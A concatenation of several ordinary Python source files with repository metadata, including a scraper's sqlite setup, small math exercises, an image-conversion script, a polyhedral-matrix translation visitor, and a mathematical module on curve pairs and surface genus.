| no_license | https://github.com/matibraun/mercadolibre_scrapper | e167984994e328f7c5f2b3f9044f8cb6f2370c21 | 178f640669e586435963fb034c1b80fcc4aa045c | refs/heads/master | 2023-07-21T12:17:53.207525 | 2021-08-01T13:00:53 | 2021-08-01T13:00:53 | 292,346,991 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import sqlite3
def create_database():
try:
ml_scrapper = sqlite3.connect('ml_scrapper.db')
cursor = ml_scrapper.cursor()
cursor.execute("CREATE TABLE ESCOBAR (index_ INTEGER, geographic_area TEXT, price_symbol VARCHAR (10), price INTEGER, surface_description TEXT, surface_symbol VARCHAR (10), surface_total INTEGER, surface_from INTEGER, surface_to INTEGER, link TEXT)")
ml_scrapper.commit()
ml_scrapper.close()
print ('Database created successfully\n')
    except sqlite3.OperationalError:
        # most likely the ESCOBAR table already exists; nothing to do
pass | UTF-8 | Python | false | false | 584 | py | 7 | create_database.py | 6 | 0.683219 | 0.669521 | 0 | 17 | 33.411765 | 258 |
lostsquirrel/python_test | 5,025,111,748,757 | 332c28f9fa580ef835e4e3652a47abb93947e380 | fc629dba07e98bfd44a671112f47091ad8935631 | /read_books/edu/hit/guide/test.py | a520402d5cdd27d94728ffe0c9696f2e63cfff5d | []
| no_license | https://github.com/lostsquirrel/python_test | c990e0c29bdf2eecae9411983b68d1f984afac84 | eb171b45bbf2f29cd1307aefd8e4609b683773d8 | refs/heads/master | 2022-09-01T11:30:16.847626 | 2022-05-18T07:43:49 | 2022-05-18T07:43:49 | 9,890,003 | 0 | 1 | null | false | 2022-05-18T07:43:49 | 2013-05-06T15:35:24 | 2021-12-02T10:04:35 | 2022-05-18T07:43:49 | 315 | 0 | 1 | 0 | Python | false | false | '''
Created on May 12, 2015
@author: lisong
'''
def gcd(m, n):
r = m % n
if r == 0:
return n
else:
        # r already holds m % n (one Euclidean step), so recurse directly
return gcd(n, r)
print gcd(384, 84)
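# gcd(384, 84) is 12 (384 = 2**7 * 3, 84 = 2**2 * 3 * 7), so this prints 12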
if __name__ == '__main__':
pass | UTF-8 | Python | false | false | 213 | py | 216 | test.py | 208 | 0.455399 | 0.399061 | 0 | 15 | 13.266667 | 26 |
alex4814/algo-solution | 6,657,199,331,794 | 8517581eb3f5dbec30b25eb484b51888cb9f69eb | 7babdd66023024927ef33ea9685f14b7732cac5e | /project-euler/python2/022.py | 4fcfeb79153908ed918aaaa5d00cbbf147a74df7 | []
| no_license | https://github.com/alex4814/algo-solution | 2f458961b02e4e0348d4283f2ed034b7fca4f537 | f3478bad3a36fe6eff8665718b63f3475370f028 | refs/heads/master | 2021-01-21T04:35:18.212839 | 2020-08-02T03:27:18 | 2020-08-02T03:27:18 | 24,101,204 | 1 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | def name_score(name):
return sum(ord(c) - ord('A') + 1 for c in name)
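# e.g. name_score('COLIN') == 3 + 15 + 12 + 9 + 14 == 53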
with open('p022_names.txt') as f:
names = f.read().split(',')
names = [name.strip('"') for name in names]
names.sort()
print sum((i+1) * name_score(name) for i, name in enumerate(names))
| UTF-8 | Python | false | false | 275 | py | 518 | 022.py | 486 | 0.603636 | 0.585455 | 0 | 9 | 29.555556 | 67 |
brianshen1990/KeepLearning | 14,267,881,388,276 | 6befa83ec00a47fea96c3b58c379b3b686943157 | 6ef9dff586c4411251710396c27b97c6a5c701ee | /Coursera/Python_IT_Google/T06/C04/changeImage.py | 8053b8fb7fac27986428d5b8a8e811caaa8019e1 | [
"MIT"
]
| permissive | https://github.com/brianshen1990/KeepLearning | 57ecba54705d389b6ae6067daa1aad03c2ddf10b | e15092fc639cc14cd191b6748e4ee0e23f02930e | refs/heads/master | 2022-05-29T08:33:50.693135 | 2022-05-28T12:48:57 | 2022-05-28T12:48:57 | 252,941,917 | 4 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | #!/usr/bin/env python3
from PIL import Image
import os
import re
src = "./supplier-data/images/"
dst = "./supplier-data/images/"
def main():
# read all images
fileslist = []
for root, dirs, files in os.walk(src):
for name in files:
if str(name).endswith(".tiff"):
fileslist.append(name)
# print(fileslist)
for image in fileslist:
im = Image.open(src + image)
        final_name = re.sub(r"\.tiff$", ".jpeg", image)
final_name = dst + final_name
print(src + image + " => " + final_name)
        # JPEG has no alpha channel, so convert to RGB before saving
        im.resize((600,400)).convert("RGB").save(final_name, 'jpeg')
if __name__ == "__main__":
main()
| UTF-8 | Python | false | false | 634 | py | 1,325 | changeImage.py | 1,188 | 0.599369 | 0.588328 | 0 | 28 | 21.571429 | 64 |
AakashJaswal/Python | 7,971,459,332,668 | 7ffaf7e9092a6ba0cd20785efbe3cef5ecaea5e8 | c5b8ed383f09ede5ed238dd316986a80d4a97300 | /CCPractice/1.Recursion/recusive.py | 5ef8820fd3cb71982d9375bf026011a4c8e2f921 | []
| no_license | https://github.com/AakashJaswal/Python | 3d4f49fc37c946191856d91058636836045f332f | fec47f235e089c980c944480e27ecefe5366685c | refs/heads/master | 2023-01-30T22:33:50.575415 | 2022-10-07T03:15:18 | 2022-10-07T03:15:18 | 296,155,681 | 0 | 1 | null | null | null | null | null | null | null | null | null | null | null | null | null | def rec(n):
if n < 1:
return 1
else:
return n * rec(n - 1)
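# e.g. rec(5) == 120 (5 * 4 * 3 * 2 * 1)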
def fib(counter, final, a=0, b=1):
if counter >= final:
print("")
return 1
else:
print(a, end=" ")
a, b, counter = b, a + b, counter + 1
fib(counter, final, a, b)
def fib_hard_counter(final, a=0, b=1):
if a >= final:
print("")
return 1
else:
print(a, end=" ")
a, b = b, a + b
fib_hard_counter(final, a, b)
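# Both fib helpers print the sequence as a side effect rather than return it;
# e.g. fib(0, 5) and fib_hard_counter(5) each print "0 1 1 2 3".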
num = int(input("Enter a number to find factorial for: "))
print(rec(num))
counter = int(input("Enter how many fibonacci no you need: "))
fib(0, counter)
hard_limit = int(input("Enter upto how many fibonacci no you need: "))
fib_hard_counter(hard_limit) | UTF-8 | Python | false | false | 747 | py | 29 | recusive.py | 28 | 0.534137 | 0.519411 | 0 | 36 | 19.777778 | 70 |
lamielle/iegen | 5,334,349,416,629 | a7213c54a06f606b38cdb2d6ea12070f062c867a | 07aa9b5a07df2a80b7d899da1da63c84b1060fec | /src/iegen/ast/visitor/_trans_visitor.py | 6e912b59c68098ac2632c6438b39c345eeccba05 | []
| no_license | https://github.com/lamielle/iegen | f26da812a01557daca086e0a1c76a62af8fe7cd4 | 0f48edad8d14ae18c907d705751552cf6eb53c8e | refs/heads/master | 2016-09-05T12:48:23.698779 | 2010-12-14T19:17:13 | 2010-12-14T19:17:13 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from iegen.ast.visitor import DFVisitor
#Translation Visitor: Translate the visited Set or Relation into
# a matrix representing a domain or scattering function in
# CLooG format.
#
#Briefly, this format is a matrix that represents a polyhedron.
#Each row of the matrix is one constraint, either equality or inequality.
#
#For domain constraint matrices, the columns are ordered as follows:
#eq/in iterators parameters constant
#Col 1: {0,1} 0=equality 1=inequality
#Col 2-num iterators+1: coefficients on the iterators in this constraint
#Col num iterators+2-num iterators+num parameters+1: coefficients on the
# parameters (symbolics)
#Col num iterators+num parameters+2: constraint constant
#
#For scattering function constraint matrices, the columns are ordered as follows:
#eq/in out-vars in-vars parameters constant
#Col 1: {0,1} 0=equality 1=inequality
#Col 2-num out-vars+1: identity row (1 for associated out var, 0s elsewhere)
#Col num out-vars+2-num out-vars+num in-vars+1: input var coefficients
#Col num out-vars+num in-vars+2-num out-vars+num in-vars+num params+1: parameter coefficients
#Col num out-vars+num in-vars+num params+2: constraint constant
#
#Multiple conjunctions of PresSet objects in the Set (for a domain)
# will be translated to a collection of constraint matrices
# (a union of polyhedra).
#Multiple conjunctions of PresRelation objects in the Relation
# are not supported, a ValueError will be raised if this is detected.
#
#This visitor requires as input a collection of names of parameters.
#This is needed so that multiple uses of this visitor have the same parameter
# columns in common.
#
#The result of this visitor is placed in the mats attribute.
#In the case of a domain (Set) this may have multiple matrices.
#In the case of a scattering function (Relation) this will have a single matrix.
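#For example (illustration only), the set {[i] : 0 <= i <= N-1} with the single
#parameter N translates to the domain matrix
#  [[1,  1, 0,  0],    (  i         >= 0 )
#   [1, -1, 1, -1]]    ( -i + N - 1 >= 0 )
#whose columns are [eq/in, i, N, constant].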
class TransVisitor(DFVisitor):
def __init__(self,params):
self.params=params
self.at_var_tuple=False
#init the result list
self.mats=[]
#---------- Visiting state variables ----------
#Are we within a Set?
self.in_set=False
#Are we within a Relation?
self.in_relation=False
#Dictionary of name -> column position mappings
self.name_dict=None
#----------------------------------------------
def calc_name_dict(self,var_names):
names=var_names+self.params
name_dict={}
for pos,name in enumerate(names):
name_dict[name]=pos+1
return name_dict
#Calculates the number of columns in the matrix we are creating
def calc_num_cols(self):
#1 column for the eq/in column
#len(self.name_dict) columns
#1 column for the constant column
return 1+len(self.name_dict)+1
def inPresSet(self,node):
#Starting to translate a PresSet to a matrix, init the result matrix
self._mat=[]
#Build mappings for tuple variables and symbolics to column index
self.name_dict=self.calc_name_dict([var.id for var in node.tuple_set.vars])
def outPresSet(self,node):
#Append the current result matrix to the result matrix collection
self.mats.append(self._mat)
def inRelation(self,node):
#Make sure this Relation has only a single conjunction
if len(node.relations)!=1:
raise ValueError('Translation of multiple Relation conjunctions is not supported')
def inPresRelation(self,node):
#Starting to translate a PresRelation to a matrix, init the result matrix
self._mat=[]
#Build mappings for tuple variables and symbolics to column index
self.name_dict=self.calc_name_dict([var.id for var in node.tuple_out.vars+node.tuple_in.vars])
def outPresRelation(self,node):
self.mat=self._mat
def inVarTuple(self,node):
self.at_var_tuple=True
def outVarTuple(self,node):
self.at_var_tuple=False
def inInequality(self,node):
#Create a new row for an inequality constraint
self._row=[0]*self.calc_num_cols()
self._row[0]=1
def outInequality(self,node):
self._mat.append(self._row)
def inEquality(self,node):
#Create a new row for an equality constraint
self._row=[0]*self.calc_num_cols()
self._row[0]=0
def outEquality(self,node):
self._mat.append(self._row)
def inVarExp(self,node):
if not self.at_var_tuple:
#Get the column of this variable in the matrix
try:
pos=self.name_dict[node.id]
#Assign this variable's coefficient to the matrix in the proper column
self._row[pos]=node.coeff
except KeyError,e:
raise ValueError("Variable '%s' is either a free variable or was not specified as a parameter"%(node.id))
#Cannot translate formulas with functions
def inFuncExp(self,node):
raise ValueError('Translation of function expressions is not supported.')
def inNormExp(self,node):
#Set the last element in the row to the constant value of the expression
self._row[-1]=node.const
| UTF-8 | Python | false | false | 4,734 | py | 225 | _trans_visitor.py | 164 | 0.739332 | 0.731517 | 0 | 140 | 32.814286 | 109 |
ChadShoeby/baseballBot | 5,935,644,810,455 | 51d07e2c0c3a5d7819adc60b56466b77de6ec9fd | deb32700ef636086754b8b60ff55a9cd18de08f6 | /baseballBot/frontoffice/models/ManagerProfile.py | b68ec6d9167aaf2e67180e255ebca2a3ea5c1b76 | []
| no_license | https://github.com/ChadShoeby/baseballBot | 3adbdd67648d3b62ccfedbe93f16dcef49ed6631 | fbaf4095a3d08355587b7b8b33bff3683be63ebc | refs/heads/master | 2022-12-19T19:10:53.900648 | 2020-10-15T00:04:35 | 2020-10-15T00:04:35 | 261,327,302 | 2 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from django.db import models
from django.contrib.auth.models import User
from frontoffice.models import League
class ManagerProfile(models.Model):
user = models.OneToOneField(User, related_name='manager_profile', on_delete=models.CASCADE)
    league = models.ForeignKey(League, related_name='manager_profile', on_delete=models.CASCADE, null=True)
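    # Reverse accessors implied by related_name (default Django behavior):
    #   some_user.manager_profile   -> this profile (OneToOneField)
    #   some_league.manager_profile -> manager over the profiles in that league (ForeignKey)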
| UTF-8 | Python | false | false | 352 | py | 108 | ManagerProfile.py | 83 | 0.792614 | 0.792614 | 0 | 8 | 43 | 106 |
MICC/MICC | 6,914,897,363,974 | 58b6eb7286c905617cb6ecfa756617ad998545c0 | e19ca1786b1e32bc0537984923f6f94c19ba57eb | /micc/curves.py | 87122f4754ce3f486fa48f4c27d8398ac8459493 | [
"MIT"
]
| permissive | https://github.com/MICC/MICC | 136939f72daa94613645fcc814618ef8564f6944 | 6b220b29e11cbe05e797bf4dd663f594979cc78b | refs/heads/master | 2023-07-19T20:41:33.652707 | 2015-01-12T18:59:38 | 2015-01-12T18:59:38 | 20,266,752 | 0 | 1 | MIT | false | 2023-07-06T21:04:09 | 2014-05-28T17:46:51 | 2015-01-12T18:59:38 | 2023-07-06T21:04:09 | 590 | 1 | 2 | 2 | C++ | false | false | # Give curve pairs class structure in preparation for public access
import numpy as np
from itertools import product, izip
from copy import deepcopy
import re
def fix_matrix_signs(M):
'''
:param M: The matrix with incorrect signs.
:type M: numpy.array(dtype=float64) of shape (2,n,4)
:returns: The matrix of shape (2,n,4) with appropriate signs.
Given a matrix corresponding to a curve pair,
    fixes the signs so that the matrix can be traversed by boundary_count.
    Starts from the simplest point, then assigns signs based on matching values.
ENS: No qualitative results about the curve pair will be changed by this,
since orientation is just a formality.
'''
row, col = [-1, 1]
sgn = 1
#for ii in range(len(M[0,:])):
while 0 in M[1, :, 1:4:2] and row < M.shape[1]-1:
row += 1
sgn = -sgn
# Starting position and sign are arbitrary.
for i in range(M.shape[1]):
g_val = int(M[0, row, col])
new = np.array(np.where(M[0, g_val, :] == row))
#print np.where(new%2==col%2)
ind = int(new[np.where(new % 2 == col % 2)])
sgn = -sgn
M[1, g_val, ind] = sgn
ind += 2
ind = ind % M.shape[2]
sgn = -sgn
M[1, g_val, ind] = sgn
row = g_val
col = ind
M[1, :, 0] = -1
M[1, :, 2] = 1
return M
def concatenate_matrix(M1, M2):
'''
:param M1: First matrix to combine
:type M1: numpy.array(dtype=float64) of shape (2,n,4)
:param M2: Second matrix to combine
:type M2: numpy.array(dtype=float64) of shape (2,m,4)
:returns: final matrix
Note that n does not have to equal m in general.
Combines two curve pairs into one.
REQ: curve pairs are, of course, encoded as matrices.
INV: new matrix signs will be correct
INV: final matrix will correspond to a single curve.
'''
top_M = np.copy(M1)
bot_m = np.copy(M2)
n = M1.shape[1]
m = M2.shape[1]
top_M[0, 0, 0] = n + m - 1
top_M[0, n-1, 2] = n
bot_m[0] += n * np.ones(M2[0].shape)
bot_m[0, m-1, 2] = 0
bot_m[0, 0, 0] = n-1
new_M = np.vstack((top_M[0], bot_m[0])) # Multi-curve
new_M = np.vstack((new_M, np.vstack((top_M[1], bot_m[1])))).reshape((2, n+m, 4))
left = zip(np.where(top_M[0] == n-1)[0], np.where(top_M[0] == n-1)[1])
i0, j0 = 0,0
for pair in left:
i, j = pair
if j % 2 == 1:
i0, j0 = i, j
new_M[0, i0, j0] = n
temp_ind = np.where(new_M[0, n-1, :] == i0)[0]
temp_ind = int(temp_ind[temp_ind % 2 == 1][0])
temp_val = new_M[0, n-1, temp_ind]
switch_val = new_M[0, n, temp_ind]
new_M[0, n-1, temp_ind] = switch_val
new_M[0, n, temp_ind] = temp_val
return_ind = new_M[0, switch_val, :] == n
return_ind[0:3:2] = False
new_M[0, switch_val, return_ind == True] = n-1
return fix_matrix_signs(new_M)
## Path finding methods -- used to find edge paths in the complement of beta-curve.
## Most are helpers for findAllPaths below.
def visited(curr, face, path):
"""
    :param curr: the edge we are currently extending from
    :param face: the face containing curr
    :param path: the path built so far
    :return: 1 if any other edge of face already appears in path, else 0
"""
my_face = list(face)
my_face.remove(curr)
v = 0
for edge in my_face:
if edge in path:
v = 1
return v
def is_unique(path, all_paths):
'''
    :param path: candidate path
    :type path: list
    :param all_paths: paths found so far
    :type all_paths: list
:returns: boolean
'''
return not (path in all_paths)
def shift(path):
'''
Reorders path with a minimum intersection as the base point.
This is useful for determining path uniqueness.
:param path: list of intersections representing the current path
:type path: list
:returns: list with intersections shifted in order such that the lowest intersection is in the first position.
'''
temp = path.index(min(path))
return path[temp:] + path[:temp]
def invert(path):
'''
:param path: some path
:type path: list
:returns: the inverted path
'''
return shift(path[::-1])
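# For instance, shift([4, 2, 3, 1]) == [1, 4, 2, 3] (a rotation, not a sort),
# and invert([1, 4, 2, 3]) == [1, 3, 2, 4] (reverse, then rotate).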
def path_finished_single(edge, face, path):
'''
    :param edge: candidate closing edge
    :type edge: int
    :param face: the face currently being traversed
    :type face: list
    :param path: the path built so far
    :type path: list
    :returns: True if the path closes up on edge through this face
'''
C = len(path) > 2 and (edge == path[-1])
faceL = list(face)
faceL.remove(edge)
C = C and not set(faceL).isdisjoint(set(path))
#meeting = lambda e1, e2, face: e1 in face and e2 in face
return C
def path_finished_double(edge, face, path):
'''
    :param edge: candidate closing edge
    :type edge: int
    :param face: the face currently being traversed
    :type face: list
    :param path: the path built so far
    :type path: list
    :returns: True if the path closes up on edge and edge occurs exactly twice
'''
C = len(path) > 2 and (edge == path[-1])
faceL = list(face)
faceL.remove(edge)
C = C and not set(faceL).isdisjoint(set(path))
if path.count(edge) != 2 :
C = 0
#meeting = lambda e1, e2, face: e1 in face and e2 in face
return C
def find_new_paths(current_path, my_face, faces, all_paths, path_function):
'''
    :param current_path: the path built so far
    :type current_path: list
    :param my_face: the face we arrived from
    :type my_face: list
    :param faces: all faces of the complement
    :type faces: list
    :param all_paths: accumulator for completed paths
    :type all_paths: list
    :param path_function: predicate deciding when a path is complete
    :type path_function: callable
    :returns: None; completed paths are appended to all_paths
'''
start = current_path[0]
next_edge = None
sub_path = []
faces_without_current_face = list(faces)
faces_without_current_face.remove(my_face)
for face in faces: # Check all faces...
if start in face and face is not my_face:
#if we find the start edge in another face...
for other_face in faces_without_current_face:
#go through its edges...
if start in other_face: # needed?
face_without_start = list(other_face)
face_without_start.remove(start)
for non_starting_edge in face_without_start:
# try all edges in that path
next_edge = non_starting_edge
if (not visited( start, other_face, current_path ) ) and\
(next_edge not in my_face):
sub_path = [next_edge]
sub_path.extend(current_path)
# Recursive call to take all possible directions
find_new_paths(sub_path, other_face, faces, all_paths, path_function)
elif path_function(next_edge, other_face, current_path):
new_found_path = shift(current_path)
inverted_path = invert(current_path)
unique = lambda path: is_unique(path, all_paths)
if unique(new_found_path) and unique(inverted_path):
all_paths.append(new_found_path)
face_without_start.append(start)
faces_without_current_face.append(face)
def remove_duplicates(faces, all_paths):
'''
    :param faces: all faces of the complement
    :type faces: list
    :param all_paths: candidate paths
    :type all_paths: list
    :returns: all_paths with any path that uses three edges of a single face removed
'''
paths = list(all_paths)
for path in paths:
for f in faces:
counter = 0
for e in f:
if e in path:
counter += 1
if counter == 3:
all_paths.remove(path)
return all_paths
def find_all_paths(faces):
'''
    :param faces: all faces of the complement
    :type faces: list
    :returns: all closed edge paths through the faces
'''
all_paths = []
forward = lambda path, face, path_function: find_new_paths(path, face, faces, all_paths, path_function)
for face in faces:
for edge in face:
forward([edge], face, path_finished_single)
#forward([edge], face, pathFinishedDouble)
all_paths = remove_duplicates(faces, all_paths)
return all_paths
## Now that we have the paths, they need to be
## re- indexed so that matrices can be built from them.
def build_matrices(edge_paths, all_paths):
'''
:param edge_paths: list of face boundary orientations
:type edge_paths: list
:param all_paths: list
:type all_paths: list
Take the paths in the skeleton of the complement of the transverse curve
And create matrices.
'''
#print 'edgePaths:',edgePaths
#print 'AllPaths:',AllPaths[0].loops
master_list = []
# Allow paths to be referenced by face
#print edgePaths
for itr in range(len(edge_paths)):
edge_paths[itr] = dict(edge_paths[itr])
#print 'all_paths:',all_paths
#print 'edge_paths:',edge_paths
ordered_paths , mapped_paths = [],[]
# Rescale path 0-len(path) for matrix
for path in all_paths:
ordered_path = list(np.sort(path))
ordered_paths.append(ordered_path)
mapped_paths.append(dict(zip(ordered_path,range(len(path)))))
#print mapped_paths,'\n'
#Create Matrices using details from edge paths.
for Path, mapped_path in zip(all_paths, mapped_paths):
#Value Matrix
path_size = len(Path)
shape = (path_size, 4)
last = Path[len(Path)-1]
M = np.zeros(shape)
M2 = np.zeros(shape)
M[:, 0] = np.array([path_size-1]+range(path_size-1))
M[:, 2] = np.array(range(1,path_size)+[0])
past_edges = dict()
future_edges = dict()
old_vertex = last
itr = 1
for vertex in Path:
flag = False
for path in edge_paths:
keys = set(path.keys())
if vertex in keys and old_vertex in keys:
past_edges[vertex] = path[vertex]
flag = True
if vertex in keys and Path[itr % path_size] in keys:
if flag:
future_edges[vertex] = (path[vertex] + 2) % 4
else:
future_edges[vertex] = path[vertex]
flag = False
old_vertex = vertex
itr += 1
old_vertex = last
itr = 1
for vertex in Path:
curr_vertex = vertex
next_vertex = Path[itr % path_size]
M[mapped_path[vertex], past_edges[vertex]] = mapped_path[old_vertex]
M[mapped_path[vertex], future_edges[vertex]] = mapped_path[next_vertex]
old_vertex = curr_vertex
itr += 1
# Sign matrix: Stand-alone function
M = fix_matrix_signs(np.array([M, M2], dtype=int))
master_list.append(M)
# End while
return master_list
def face_parse(alpha_edges):
'''
:param alpha_edges: set of faces with alpha edges.
    :type alpha_edges: list
    :returns: (bridges, islands, length_check) bridges: 4-sided regions; islands: n > 4 - gons; length_check: the number of alpha edges included.
Separate set of all faces into bridges (4-sided regions) and
islands (higher-sided regions) for distance calculator.
'''
bridges, islands = [], []
length_check = []
for pair in alpha_edges:
if pair[0] == 4:
bridges.append(pair)
else:
islands.append(pair)
length_check.extend(list(pair[1]))
return bridges, islands, len(length_check)
###### For Distance Extension #######
def connected(P1, P2):
'''
    :param P1: first path
    :type P1: list
    :param P2: second path
    :type P2: list
    :returns: 1 if the paths overlap without being disjoint or identical, else 0
'''
S1 = set(P1)
S2 = set(P2)
if S1.isdisjoint(S2) or (S1.issubset(S2) and S1.issuperset(S2)):
return 0
else:
return 1
def share_edge(path1, path2):
'''
    :param path1: first path
    :type path1: list
    :param path2: second path
    :type path2: list
    :returns: (1, index of the shared edge in path2) if exactly one edge is shared, else (0, -1)
    '''
    if set(path1).isdisjoint(path2):
return 0, -1
else:
intersection_set = set(path1) & set(path2)
numshared = len(intersection_set)
if numshared != 1:
return 0, -1 #Then they share too much!
else:
shared_item = intersection_set.pop()
return 1, path2.index(shared_item)
def find_combined_paths(all_paths, M_library):
'''
    :param all_paths: all edge paths in the complement
    :type all_paths: list
    :param M_library: matrices keyed by the index of the corresponding path
    :type M_library: dict
    :returns: list of matrix pairs whose underlying paths share exactly one edge
'''
list_of_connected = []
path_library = dict(zip(range(len(all_paths)), all_paths))
index1 = 0
for path1 in all_paths:
index2 = 0
for path2 in all_paths:
if share_edge(path1, path2)[0]:
list_of_connected.append((M_library[index1],
M_library[index2]))
index2 += 1
index1 += 1
return list_of_connected
def faces_share_two_edges(faces):
'''
    :param faces: list of faces, each a collection of alpha edges
    :type faces: list
    :returns: 1 if some pair of distinct faces shares more than one edge, else 0
'''
distance_three_flag = 0
for face in faces:
faces_without_face = list(faces)
faces_without_face.remove(face)
for other in faces_without_face:
if len(set(face) & set(other)) >1: distance_three_flag = 1
return distance_three_flag
def edges(M):
'''
:param M: the matrix representing a pair of curves
:type M: numpy.array(dtype=float64) of shape (2,n, 4)
    :returns: (all_faces, Paths) all_faces: tuples of faces including size and set of alpha-edges which bound them; Paths: same as all_faces, except also including the orientation of the boundary edges.
'''
#print 'called edges'
# The em list is needed to hold the tuples of (faceLength, faceEdges)
all_faces = []
# INV: Number of faces found.
faces = 0
num_rows, num_cols = M.shape[1:3] #num_rows, num_cols
old_vertices = [] ##list of previous paths
bigonFlag = 0
# Bigons are unwanted structures.
Paths = [] # alpha - edge paths.
facesTemp = dict()
for i,j in product(range(num_rows),range(num_cols)):
#Set of edges associated with face
face = set()
if faces == num_rows:
break # upper bound on possible no. faces
# Start position in matrix: returning to this means a face has been
# enclosed
io =i
jo=j
found = 0 #exit condition
# Number of edges for face. Keeps track of vector solution
edges=0
pathTemp = [];
# Begin traversal
while not found:
gval = int(M[0,i,j]);
#current value at index gives next vertex/row
#value check
arr1 = M[0,gval,:] == i%num_rows
arr2 = M[1,gval,:] != M[1,i,j] #sign check
i_next = gval
alpha = (M[0,i,0]+1)%num_rows
i= i_next
new = np.where(arr1 & arr2)[0]
#new = np.intersect1d(arr1[0],arr2[0],assume_unique=True)
#ENS: val and sign correct
ind = np.where(new%2==j%2) #ENS: beta->beta, alpha->alpha
j_next = (int(new[ind])+1)%num_cols #Always move clockwise
j_old = j
j = j_next
if (i,j) in old_vertices:
break
old_vertices.append((i,j))
edges += 1
alpha_new =( M[0,i,0]+1) % num_rows;
shift = (alpha_new - alpha)
if (shift==1 and j%2 == 1) or (shift == 1-num_rows and alpha_new==0 and j%2==1):
face.add(alpha_new)
pathTemp.append((alpha_new,(j)%num_cols))
elif (shift==-1 and j%2==1 ) or (shift == num_rows-1 and alpha ==0 and j%2==1):
face.add(alpha)
pathTemp.append((alpha,(j)%num_cols))
if (i,j)==(io,jo):
facesTemp[edges] = facesTemp.get(edges,0) +1
if edges==2:
bigonFlag = 1
if not bigonFlag:
Paths.append(pathTemp)
faces += 1
found = 1
all_faces.append((edges,face))
#from sys import stderr
#stderr.write('all_faces '+str(all_faces)+'\n')
#stderr.write('Paths '+str(Paths))
return all_faces, Paths
def boundary_count(M):
'''
:param M: the matrix representing a pair of curves
:type M: numpy.array(dtype=float64) of shape (2,n, 4)
:returns: (faces, bigon) faces: number of faces; bigon: 1 iff a bigon is found
'Simply' count the number of faces bounded by two filling curves on a surface.
Curves must be encoded as matrix according to vertices of intersection and
associated orientation.
'''
faces = 0
numrows, numcols = M.shape[1:3] #num_rows, num_cols
oldEdges = [ ] ##list of previous edge paths
bigonFlag =0
for i,j in product(range(numrows),range(numcols)):
# upper bound on possible no. faces is number of vertices
if faces==numrows: break
io =i
jo=j
#First matrix element; will go to vertex M[0,i,j]
found = 0 #Exit condition
pathLength=0 # Keep track of path length
while not found:
gval = int(M[0,i,j]);
#current value at index gives next vertex/row
arr1 = np.where(M[0,gval,:] == i%numrows) #value check
arr2 = np.where(M[1,gval,:] == -M[1,i,j]); #sign should flip +/-
i = gval # Go to next vertex/row
new = np.intersect1d(arr1[0],arr2[0],assume_unique=True)
#ENS: val and sign correct
ind = np.where(new%2==j%2)
#ENS: beta->beta, alpha->alpha
j = (int(new[ind])+1)%numcols
#Always move clockwise - to next edge
if (i,j) in oldEdges: break
oldEdges.append((i,j))
# To save work and not go on old paths.
# Also so we don't count faces twice...
pathLength += 1
# The path length is the number of edges traversed in the current face.
if (i,j)==(io,jo):
if pathLength==2: bigonFlag = 1;
# Two edges to a face --> bigon
faces += 1
found = 1 #INV: found = 1 -> has found a bdy curve
return faces, bigonFlag
def vector_solution(edges):
solution = dict()
for face in edges:
if face[0] not in solution.keys():
solution[face[0]] = 1
else:
solution[face[0]] += 1
return solution
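# e.g. vector_solution([(4, {0, 1}), (4, {2, 3}), (6, {0, 2, 4})]) == {4: 2, 6: 1}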
def genus(M, euler=0, boundaries = 0):
'''
:param M: the matrix representing a pair of curves
:type M: numpy.array(dtype=float64) of shape (2,n, 4)
:param euler: 0 if euler characteristic not needed, else 1
:type euler: int
:returns: (g,X): g: genus; X : euler characteristic
Compute the genus of the span of a curve pair, i.e. the minimal genus surface
on which they fill.
'''
V = M.shape[1] # vertices
P, bigon = boundary_count(M) # Polygons in the complement of curve pair
#if bigon is 1: P -= 1 # pull away one bigon
#Euler characteristic (since edges = 2*vertices) is P - V
# originally X = V-E+P
X = P-V+boundaries
# genus = 1 - 0.5*euler_characteristic
Genus = (2-X)/2
    if bigon: Genus -= 1 # Bigons steal genus; this gives it back.
    returnVal = dict([(0,Genus),(1,(Genus,X))]) # For return purposes only.
return returnVal[euler]
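# For instance, a filling pair with V = 4 intersections whose complement has
# P = 2 faces gives X = 2 - 4 = -2, hence genus (2 - (-2)) / 2 = 2.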
def test_collection(matrix_list, original_genus):
'''
    :param matrix_list: matrices to test
    :type matrix_list: list of numpy.array(dtype=float64)
    :param original_genus: the genus on which the original curve pair fills
    :type original_genus: int
:returns: list of booleans and a dictionary containing the matrices without bigons.
Test a collection of matrices to see if they fill a given genus.
Note: Matrices with bigons are still counted in the calculation, but are not returned.
'''
genusCollection = []
index = 0
matrixLibrary = dict()
for M in matrix_list:
bigon = boundary_count(M)[1]
Genus = genus(M)
matrixLibrary[index] = M
index += 1
if bigon:
Genus = 0 # If it has a bigon, it should automatically fail
genusCollection.append(Genus)
# Test if all fill and thus distance g.t. 3
test = [Genus == original_genus for Genus in genusCollection]
return test, matrixLibrary
def fourgonTest(F4, Fn):
'''
    :param F4: bridge faces (4-gons)
    :type F4: list
    :param Fn: island faces (more than four sides)
    :type Fn: list
    :returns: True if some island shares at least two edges with some bridge, False otherwise
'''
for islandFace in Fn:
for bridgeFace in F4:
if len(islandFace[1] & bridgeFace[1]) >= 2: return True
return False
def Three(M, allPaths, ext=0, originalGenus = False, boundaries = False, edge_data = False):
    '''
    :param M: the matrix representing a pair of curves
    :type M: numpy.array(dtype=float64) of shape (2,n,4)
    :param allPaths: all edge paths in the complement of the reference curve
    :type allPaths: list
    :param ext: reserved for the distance extension; currently unused
    :type ext: int
    :param originalGenus: optional precomputed genus of the pair; computed via genus(M) when omitted
    :param boundaries: optional precomputed (faces, bigon) from boundary_count(M)
    :param edge_data: optional precomputed (Faces, edgePaths) from edges(M)
    :returns: [three, matrixLibrary], where three is 1 if the curve pair is distance three and 0 otherwise.
    '''
three, matrixLibrary = 0, dict()
if not originalGenus:
originalGenus = genus(M)
if not boundaries:
F0, bigon = boundary_count(M)
else:
F0, bigon = boundaries
    if not edge_data:
        #Calculate face alpha edges and alpha edge paths
        Faces, edgePaths = edges(M)
    else:
        Faces, edgePaths = edge_data
Bridges, Islands, lengthCheck = face_parse(Faces)
# Bridges are faces bounded by four edges.
# Islands are bounded bt more than four, say six or eight...
bridgeFaces = [list(face[1]) for face in Bridges]
islandFaces = [list(face[1]) for face in Islands]
############# Quick and dirty checks for distance three #############
if F0 == 1 :
three = 1
